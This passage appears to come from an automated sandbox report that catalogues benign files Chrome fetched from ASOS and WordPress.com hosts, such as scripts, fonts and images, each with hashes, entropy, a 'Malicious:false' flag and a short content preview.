                                                                                                                                                                                                                                                                  Preview:/*! This file is auto-generated */.// Source: wp-includes/js/twemoji.min.js.var twemoji=function(){"use strict";var h={base:"https://cdn.jsdelivr.net/gh/jdecked/twemoji@15.0.3/assets/",ext:".png",size:"72x72",className:"emoji",convert:{fromCodePoint:function(d){d="string"==typeof d?parseInt(d,16):d;if(d<65536)return e(d);return e(55296+((d-=65536)>>10),56320+(1023&d))},toCodePoint:o},onerror:function(){this.parentNode&&this.parentNode.replaceChild(x(this.alt,!1),this)},parse:function(d,u){u&&"function"!=typeof u||(u={callback:u});return h.doNotParse=u.doNotParse,("string"==typeof d?function(d,a){return n(d,function(d){var u,f,c=d,e=N(d),b=a.callback(e,a);if(e&&b){for(f in c="<img ".concat('class="',a.className,'" ','draggable="false" ','alt="',d,'"',' src="',b,'"'),u=a.attributes(d,e))u.hasOwnProperty(f)&&0!==f.indexOf("on")&&-1===c.indexOf(" "+f+"=")&&(c=c.concat(" ",f,'="',u[f].replace(t,r),'"'));c=c.concat("/>")}return c})}:function(d,u){var f,c,e,b,a,t,r,n,o,s,i,l=function d(u,f){v
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 91700, version 1.590
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):91700
                                                                                                                                                                                                                                                                  Entropy (8bit):7.997578233786376
                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                  SSDEEP:1536:moJdZk4qRq8nhA0K46olDtLWozaRQGWzoEr9+yIVhld/ghu8SoRSO:JJkRPAtHolIozaRQzzt9CmuN2f
                                                                                                                                                                                                                                                                  MD5:2DADBB3C03C1CDF1491621ADCAA9EA84
                                                                                                                                                                                                                                                                  SHA1:8773EFEC2A3A7235FE0FB6E700D113D9401CB6AF
                                                                                                                                                                                                                                                                  SHA-256:BB391EE077B5B90859C5EBC8CD3AC6B5D6D90ADF15AF75E3CF04EE1690B90821
                                                                                                                                                                                                                                                                  SHA-512:455C314CAFAE03601A93803961DC454CF2B12A8FC775735EC9417415058F0C646D103E339966A0E1E45BD05AE1857B29AD8946B8BAB90FA23FC2460AB09A003A
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://assets.asosservices.com/fonts/futura-pt/book.1bb391ee.woff2
                                                                                                                                                                                                                                                                  Preview:wOF2......f4.......h..e....N.......................b..t..{.`...."..a.....\........6.$..\..`.. ..+..u...[.Y...2.[.A..f.&j...>._...G.9....i..N_...6...m;ZV..k...JK>........6..y#..A.....,M...SU2.u.....Q.:$+....UMj0...JL...4.l^.L...z.......\.i...f.;.UX.........0....!........&..j...../..p..B..f.T.......C{.Z.URF/G{Ew...m..n.[.......z1j/..\.ZX.^.zf...-..>....#79.QY.-7dyg6..#.{im.+.#_..d.vW.............=...kaB....y...../.UZ...)=}.......I`9V..$Jdx.72.]O.HJ......,Jr...U.R...`.0..~d....8..i0.]...}..........Lg3lKw.......Z.....W(.....rfo.L...>.!.s...!..M.+..E`...jq\..mI.r2.7;PO..r.&..Q........ck.....O..............7..q....V#.E.....0c.>..#..J.JR.0.L5.....[r..SJ..oN.......m_....q.> .0..j.dB;..)].....>.D@M...YZ..~!.......6..GY."*"* uX.....k....kc...E.*..\..v.J....0...l.xc}B</.l.V[..?..sI..5).....Tbc..F...0p..m...a. 6.LPPQ.*$.. f`$.X...X........].._b.....;].+."......n.?....=...4..A...0w.I*...62L[.a..F....!....*D.T.....~* .T:.iOnd..)7....j[.C./.+.2..\..b..d
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):5730
                                                                                                                                                                                                                                                                  Entropy (8bit):4.244128236209575
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:a/1+YH9jGit5S+ZofBU42YZWGs0W9pp3GqUTCN0gMMVqUTCN0gMMeqUTCN0gMMQ:a9l9zEcLUTCyMoUTCyM1UTCyMQ
                                                                                                                                                                                                                                                                  MD5:FEFAD1DDF3C888F66E430221294FA111
                                                                                                                                                                                                                                                                  SHA1:500266193855751FBE2581E48EE570A0AEEFEB8D
                                                                                                                                                                                                                                                                  SHA-256:9475967B4ED1A722227C1316D6F17795F4363C839A42B4336557528DF89664FE
                                                                                                                                                                                                                                                                  SHA-512:3645AD63A9770EA9622C361DEB12F3F9ADBD4F5C44879DDFD02CFC06468FBC93D42A432BC0CDFC6DC1367C0FAEEE37EEBCB1A253458AB7FE750F9F1EE9046971
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://assets.asosservices.com/asos-ui/manifest/windowManifest.js
                                                                                                                                                                                                                                                                  Preview:window.__versionManifest = {. useCurrentKeyStoreDataversion: true,. keyStoreDataversion: {. current: 'mhabj1f-41',. previous: '11a1qu9-40'. },. features: {. 'web-event-icon': {},. 'login-interstitial-page': true. },. siteChromeVersion: {. au: {. useCurrent: true,. current: '13',. previous: '12'. },. ru: {. useCurrent: true,. current: '13',. previous: '12'. },. com: {. useCurrent: true,. current: '13',. previous: '12'. },. es: {. useCurrent: true,. current: '13',. previous: '12'. },. it: {. useCurrent: true,. current: '13',. previous: '12'. },. de: {. useCurrent: true,. current: '13',. previous: '12'. },. fr: {. useCurrent: true,. current: '13',. previous: '12'. },. us: {. useCurrent: true,. current: '13',. previous: '12'. },. row: {. useCurrent: true,. current: '13',. previous: '12'.
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):89501
                                                                                                                                                                                                                                                                  Entropy (8bit):5.289893677458563
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                                                                                                                                                  MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                                                                                                                                  SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                                                                                                                                  SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                                                                                                                                  SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:PNG image data, 500 x 500, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):8203
                                                                                                                                                                                                                                                                  Entropy (8bit):7.925289586105856
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:aYH+PhNuKD4atjkFkCTdTN3KBTXW0MS44EFIcY5fPR:aYepNaGKkCMTm0MZ2cYNR
                                                                                                                                                                                                                                                                  MD5:5F7B74563BAFAFF6E4CA77BB82D511C5
                                                                                                                                                                                                                                                                  SHA1:EBCB367071A682D64A2E6471D553AD1FC1F90CD6
                                                                                                                                                                                                                                                                  SHA-256:C0E93B5EBF107AF77D9E7D101D186B3B93E9D5AD4FBB6A74E2DEA60173CC04F8
                                                                                                                                                                                                                                                                  SHA-512:D573EF0A2A6E5961021CCED439A55F3EBA9910BA53E6A01364C96549B7CBDF3EF62815B5139ABF5FE76127B8072CF8956C93CE4C6F6FFEA90C9AB2A82E5380CE
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://s2.wp.com/i/logo/wpcom-gray-white.png
                                                                                                                                                                                                                                                                  Preview:.PNG........IHDR.............../....rPLTE..................................................................................................................r..X...TIDATx.....H... .)Dd..eT....V..U.-$..g?....S(.........................................................."..H....%U......W.y..............n.?..I.I...y.}...v.....Y.7.!...8Y..U......br..lZ#.......'.Y.m.K.<JZ..P1j~..X.^.d.p&).....?..eg.y...U(....s#Og..j.N.~L..Sy.v.....1.A....r..{.I.0r........#..!#..!V.2..3;.A....jd"..m..Xm.F..@.?..>.drR?D.OB..Z....%.....F.+.*,.E..e...O4rcL.Cf....j.&..D^wo.Y...*......n</.N.k.?]....h..B~.Z.C.......13.}x..2.g..C......m...uFM.~.ON...<5......7;.A.D....xor......m'..o.:22V..[M.......E*..\..[..2.'......<L.....qL.G.c.y.......||...i..^...6......g....\....9.J......2....,#....{q........7+.Db+=m^>.NLn.."D..!.[.c..az..1.;.b.....I.\..NfZ.{.C{.^.b%....'.vFl...~.Y...x&..Z.2.Qh....s'...&.u..m....Y...J3Ml..N.B......*.).v........Uj..........2(..V..*HeP...7..2.y.7..O....
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (56943)
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):57014
                                                                                                                                                                                                                                                                  Entropy (8bit):5.378838470596009
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:LfV8BFuXNhsWi6Ns8gMoqpfwTr6TdShTdDggwLYWrxj5+xjH+HAF1riaj14:6ksBEsComf6r6TdShTJggwLYWrxj5+xY
                                                                                                                                                                                                                                                                  MD5:168008A26F9E32C4FC5449BAABBB8924
                                                                                                                                                                                                                                                                  SHA1:021F48E00109F931F930042B0CC75732DE23AF16
                                                                                                                                                                                                                                                                  SHA-256:194B419E7C48A7893691594652358A8F3029B71BC083FCB59DF98811ECEA4994
                                                                                                                                                                                                                                                                  SHA-512:8CBD7C613D81965C91F0BE2ED9EE689B64864E26C93DDB28E88B060654BA03FE45EA7AC928F8D8ADDCA2146BF975EB45FD345F32AA465F886E628B2A67BB212D
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://assets.asosservices.com/sitechromepublisher/client.newrelicclient.b259fc7924b4379328f1.js
                                                                                                                                                                                                                                                                  Preview:(()=>{"use strict";var e,t={76140:(e,t,n)=>{var r=n(60141);function i(e,t){!function(e,t){if(t.has(e))throw new TypeError("Cannot initialize the same private elements twice on an object")}(e,t),t.add(e)}function o(e,t,n){if(!t.has(e))throw new TypeError("attempted to get private field on non-instance");return n}function a(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),n.push.apply(n,r)}return n}function s(e){for(var t=1;t<arguments.length;t++){var n=null!=arguments[t]?arguments[t]:{};t%2?a(Object(n),!0).forEach((function(t){(0,r.Z)(e,t,n[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(n)):a(Object(n)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(n,t))}))}return e}n(93085),function(e,t){var n,a,c;if(/\.asos\.com$/i.test(e)&&!/local/i.test(e)?n="prod":(/\.asosservices\.
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 6 x 5
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):50
                                                                                                                                                                                                                                                                  Entropy (8bit):3.8488255736198
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:CN+ltRPQEsJen2sSX:xvQEsJ42sSX
                                                                                                                                                                                                                                                                  MD5:E4D673A55C5656F19EF81563FB10884C
                                                                                                                                                                                                                                                                  SHA1:1F2D8ED221D39329251AD3A6FF1EDB20B7219443
                                                                                                                                                                                                                                                                  SHA-256:F3A8992ACB9AB911E0FA4AE12F4B85EF8E61008619F13EE51C7A121FF87F63B1
                                                                                                                                                                                                                                                                  SHA-512:E0B03411282A979CF772F700D9E5634B0C25C612E380AD33C0D59059B1B479D027016D5BEB148403EF185430DB35F5FAED362F36CE2C8ECAD0E6D8E30CEA97B4
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://pixel.wp.com/g.gif?blog=238502921&v=wpcom&tz=-4&user_id=0&subd=dartergary&host=dartergary.wordpress.com&ref=&rand=0.82970019227276
                                                                                                                                                                                                                                                                  Preview:GIF89a.............!.......,............bx..j....;
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (12788), with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):12788
                                                                                                                                                                                                                                                                  Entropy (8bit):5.253868181785939
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:LXRPSjDWRYtEAU98twdANhSUxiNlTOD2UNFxlGXCpbJX+yCFbAvywybJKbfOas51:SkKn7wd/CFJX+1kbOKrVa
                                                                                                                                                                                                                                                                  MD5:EF880BE61458E4E89C9CB9D99D2D300E
                                                                                                                                                                                                                                                                  SHA1:C7740F6524CFAB6084682B1CE320B2E5E9C4D4CC
                                                                                                                                                                                                                                                                  SHA-256:79674B01741C3978417B6B9B4B98D125755E7BB468979D5CD593EAC4B94CDB91
                                                                                                                                                                                                                                                                  SHA-512:CAF94D36E2078830AF5D3E78FA9058CA503B5A745BB70ACA7573FCEC6ECF9DA6A5A23C4E7E00D25AE84E5D66E556A2120AAC8558490C4E9D826EFEABA698DB42
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:!function(t){var e={};function n(o){if(e[o])return e[o].exports;var r=e[o]={i:o,l:!1,exports:{}};return t[o].call(r.exports,r,r.exports,n),r.l=!0,r.exports}n.m=t,n.c=e,n.d=function(t,e,o){n.o(t,e)||Object.defineProperty(t,e,{enumerable:!0,get:o})},n.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})},n.t=function(t,e){if(1&e&&(t=n(t)),8&e)return t;if(4&e&&"object"==typeof t&&t&&t.__esModule)return t;var o=Object.create(null);if(n.r(o),Object.defineProperty(o,"default",{enumerable:!0,value:t}),2&e&&"string"!=typeof t)for(var r in t)n.d(o,r,(function(e){return t[e]}).bind(null,r));return o},n.n=function(t){var e=t&&t.__esModule?function(){return t.default}:function(){return t};return n.d(e,"a",e),e},n.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},n.p="",n(n.s=9)}([function(t,e){function n(e){return"function"==typeof Symbol&&"symbol"==typeof Symbol.i
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):3584
                                                                                                                                                                                                                                                                  Entropy (8bit):7.928464857549821
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:9sEXYk+HMSRsIK53q0mKmqekrE9IQaEmOJpOwEHtSVg//+si+MCi8iP0xRdsz6:bYvlsR3ntxrE1aEmOJcHt3//+r9L02z6
                                                                                                                                                                                                                                                                  MD5:814C967BCFF1E61CBD2FBCA2ABFA73EB
                                                                                                                                                                                                                                                                  SHA1:F4359D25B4529B960150769BC8B297C1BB115A5C
                                                                                                                                                                                                                                                                  SHA-256:D964E97D2D522765DAA6EC422A62C547F2B5564C8616C9F4BF3D7AFA08C99BE2
                                                                                                                                                                                                                                                                  SHA-512:7CE384E45ED885CAAEB9804A17965B77B2F04A333F9DAA6C3FFD3451671AEE47651992674A4220C4315F4EC407986DD124DEA9CD81C652BEDB6651DF2EF3ED58
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://assets.asosservices.com/storesa/images/flags/us.png
                                                                                                                                                                                                                                                                  Preview:.PNG........IHDR...P...P............sRGB.........IDATx..]}l......;..+.....+N...;. .....6.....*....*...R.W.....R9..T...B...$.B.$Rh. ...vc.v..G..?.......n..y.n}9.}..fo..../..y3..<....8o|t.V].Vi~.J..U.i....g*...b.q.p$%...RIiM%..N...r~~....W7.k.....u.M.....7k.w............`.fra..mJ#...R>ZE.%..X ..Q...o1')ko..?....Nn.I...^.T.F...q.).?......i.....||..$?S.x.c....K_.$..9d{.n:w.k2f.(..:g.>.PCjG..|..5.W!......?..x.(.;3~..3..)....g..Q....`'.c9.^ZI.7n.3.2=.q....^....<.9../r....J.9(..#..h...ggw.19.....a...y....7....K.....h.N(.k........7..kc-.:R..N:r.%(..{....{..)..{.?t.......(+.`..3H~!.Hg..,$..{.}H.]m....n.Y...j.....A..i......,....hll....Nzw.oE^$.x.4~..=`.2.....p.ut...y..Oq....my.m......H6{..g..w...R...8\\.....36.6...g..<......v....j..6.........w.\0n..y...o[...ue....L......)..X.W.....0K.;...Rww7....:V.X.....9.....:.C.....O}...7|..A..}.=....}...c.i......v..V.ZE%%%b\f.lhmm..947.6.Z....Q....x.P....z..'X...(....+.-.........|......FGG7....e..`N..7g%.
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (10125)
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):15575
                                                                                                                                                                                                                                                                  Entropy (8bit):5.385259463868097
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:384:H7qSPnIG1yrZAZVj34uTmX5ToHDAu/zo0j6SYlIfBIN9WMxtComqJACCN:HZPnIGgrZAZVj3XU4ASzo05BIN9WMGF9
                                                                                                                                                                                                                                                                  MD5:10F88843A3C699872A9C7EA0036F093D
                                                                                                                                                                                                                                                                  SHA1:1A237FE89B282A2528C167DB50289B77A036EAA9
                                                                                                                                                                                                                                                                  SHA-256:168088186C150D04871D7BC9E98EE9BAE60269F9F45005ABDF7803BBFAAC7245
                                                                                                                                                                                                                                                                  SHA-512:536F94ED791D2B65D8BB993BE1A6DB9C688255460E0204DD1D4B5219DD1A00AF3C90460D66561F446DD4B3E4DFDD3266036790CC5467D01E4BE307DD1B436EF1
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:// listen for rlt authentication events and pass them to children of this document..( function() {..var currentToken;..var parentOrigin;..var iframeOrigins;..var registeredIframes = [];..var initializationListeners = [];..var hasBeenInitialized = false;..var RLT_KEY = 'jetpack:wpcomRLT';...// should we inject RLT into this iframe?..function rltShouldAuthorizeIframe( frameOrigin ) {...if ( ! Array.isArray( iframeOrigins ) ) {....return false;...}...return iframeOrigins.includes( frameOrigin );..}...function rltInvalidateWindowToken( token, target, origin ) {...if ( target && typeof target.postMessage === 'function' ) {....try {.....target.postMessage( JSON.stringify( {......type: 'rltMessage',......data: {.......event: 'invalidate',.......token: token,.......sourceOrigin: window.location.origin,......},.....} ), origin );....} catch ( err ) {.....return;....}...}..}.../**.. * PUBLIC METHODS.. */..window.rltInvalidateToken = function( token, sourceOrigin ) {...// invalidate in current co
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (369), with no line terminators
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):369
                                                                                                                                                                                                                                                                  Entropy (8bit):4.832135322463785
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:C7Lo73+Vjdc73+48VeGongVD5SMhm2AzjnQTosMdsya4NAsbMo+:gljtZ9FJhpTVcdaeQZ
                                                                                                                                                                                                                                                                  MD5:70CD7908A2CC98D079D8E6D79484E95D
                                                                                                                                                                                                                                                                  SHA1:0F08CF1458EBF5BD79439DE9A82DF7C30D98287D
                                                                                                                                                                                                                                                                  SHA-256:9C83B89AB9D2677980617AFACB833A74DA3050A2D3D711176B500D7922E49AB5
                                                                                                                                                                                                                                                                  SHA-512:6C1E7BE643AB905165C6092E1EA5298952AA329489EED447F3A2D8DC2289A71EF272A53198F735D5048294BAE00B02D79BBDD7329C250BCE0CB34D43B43F8075
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:"https://s1.wp.com/_static/??/wp-content/mu-plugins/core-compat/wp-mediaelement.css,/wp-content/mu-plugins/wpcom-bbpress-premium-themes.css?m=1432920480j&cssminify=yes"
                                                                                                                                                                                                                                                                  Preview:.wp-playlist-light{color:#000}.wp-playlist-light .wp-playlist-item{color:#333}.wp-playlist-light .wp-playlist-playing{background:#fff;color:#000}.wp-playlist-dark .wp-playlist-item .wp-playlist-caption{color:#fff}.wp-playlist-caption{display:block}.bbp-staff-role{color:#f1831e}.bbp-a8c-reply{background:#e9eff3 !important;border:1px solid #c8d7e1;width:98% !important}
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):451
                                                                                                                                                                                                                                                                  Entropy (8bit):5.224725778535711
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:dkK9dg5qPJZOPKKv3t60iOk2G9jfYOk20:dtg5qPJoi630OQjYOy
                                                                                                                                                                                                                                                                  MD5:B82B1D80A9A7125C3030FBF9CF76B8F0
                                                                                                                                                                                                                                                                  SHA1:8912AC0211D62F273487C4A4F5FC1C07EC459485
                                                                                                                                                                                                                                                                  SHA-256:E21EF49782C01E7624EB1594DD969753841C96A12D9D6E3F5DEFA61BEC4CF8B3
                                                                                                                                                                                                                                                                  SHA-512:4FCF6AB63E75FE8F5C1C409A286DA80756C968E4973F1A3BCF98D8A33F8C70A30BA6B496F289494C1F67BA6D7E879C2ACAA06613CE02476044D31B63A0ED6734
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://www.asos.com/api/fashion/contentapi/v2/components/?country=GB&store=COM&lang=en-GB&keystoredataversion=mhabj1f-41&isPremier=false&isKnown=false
                                                                                                                                                                                                                                                                  Preview:<HTML><HEAD>.<TITLE>Access Denied</TITLE>.</HEAD><BODY>.<H1>Access Denied</H1>. .You don't have permission to access "http&#58;&#47;&#47;api&#45;site&#45;failover&#45;target&#46;asos&#46;com&#47;fashion&#47;contentapi&#47;v2&#47;components&#47;&#63;" on this server.<P>.Reference&#32;&#35;18&#46;17f01002&#46;1730229089&#46;4ef1457.<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;18&#46;17f01002&#46;1730229089&#46;4ef1457</P>.</BODY>.</HTML>.
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (19948), with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):19948
                                                                                                                                                                                                                                                                  Entropy (8bit):5.261902742187293
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:384:XriNpnjyMkg8XMtExRN1w29JIOzahXtO2nJ65:GijgSWuanfJ65
                                                                                                                                                                                                                                                                  MD5:EC18AF6D41F6F278B6AED3BDABFFA7BC
                                                                                                                                                                                                                                                                  SHA1:62C9E2CAB76B888829F3C5335E91C320B22329AE
                                                                                                                                                                                                                                                                  SHA-256:8A18D13015336BC184819A5A768447462202EF3105EC511BF42ED8304A7ED94F
                                                                                                                                                                                                                                                                  SHA-512:669B0E9A545057ACBDD3B4C8D1D2811EAF4C776F679DA1083E591FF38AE7684467ABACEF5AF3D4AABD9FB7C335692DBCA0DEF63DDAC2CD28D8E14E95680C3511
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:!function(){var e={343:function(e){"use strict";for(var t=[],n=0;n<256;++n)t[n]=(n+256).toString(16).substr(1);e.exports=function(e,n){var r=n||0,i=t;return[i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]]].join("")}},944:function(e){"use strict";var t="undefined"!=typeof crypto&&crypto.getRandomValues&&crypto.getRandomValues.bind(crypto)||"undefined"!=typeof msCrypto&&"function"==typeof window.msCrypto.getRandomValues&&msCrypto.getRandomValues.bind(msCrypto);if(t){var n=new Uint8Array(16);e.exports=function(){return t(n),n}}else{var r=new Array(16);e.exports=function(){for(var e,t=0;t<16;t++)0==(3&t)&&(e=4294967296*Math.random()),r[t]=e>>>((3&t)<<3)&255;return r}}},508:function(e,t,n){"use strict";var r=n(944),i=n(343);e.exports=function(e,t,n){var o=t&&n||0;"string"==typeof e&&(t="binary"===e?new Array(16):null,e=null);var a=(e=e||{}).random||(e.rng||r)();if(
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (723)
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):7076
                                                                                                                                                                                                                                                                  Entropy (8bit):5.52488676121649
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:bttd4a6O1T6ahNU3dJ+SrM0hjUYIW2WX8ISlY:bBJ1T9UNJ+SrM0lXV2WXXSlY
                                                                                                                                                                                                                                                                  MD5:88A2E0A522036C0B87E03552E56629AA
                                                                                                                                                                                                                                                                  SHA1:EC9D1157518E753A84DBDE1333A29B34CF776D63
                                                                                                                                                                                                                                                                  SHA-256:788AFB96F2DA68E8729EC35F3D5E381FAD3482D37C54C2195C7311440EE4C27E
                                                                                                                                                                                                                                                                  SHA-512:44B953878BD650FE2BCC8B6904620955C3E396B7DC8F41F85D021A8E0404DA41DB15C5499A03F7D4FE9129BB340AA3F6782942CF5327502FD4569BEBBB17073F
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://www.googletagmanager.com/static/service_worker/4al0/sw.js?origin=https%3A%2F%2Fwww.asosglobal.com
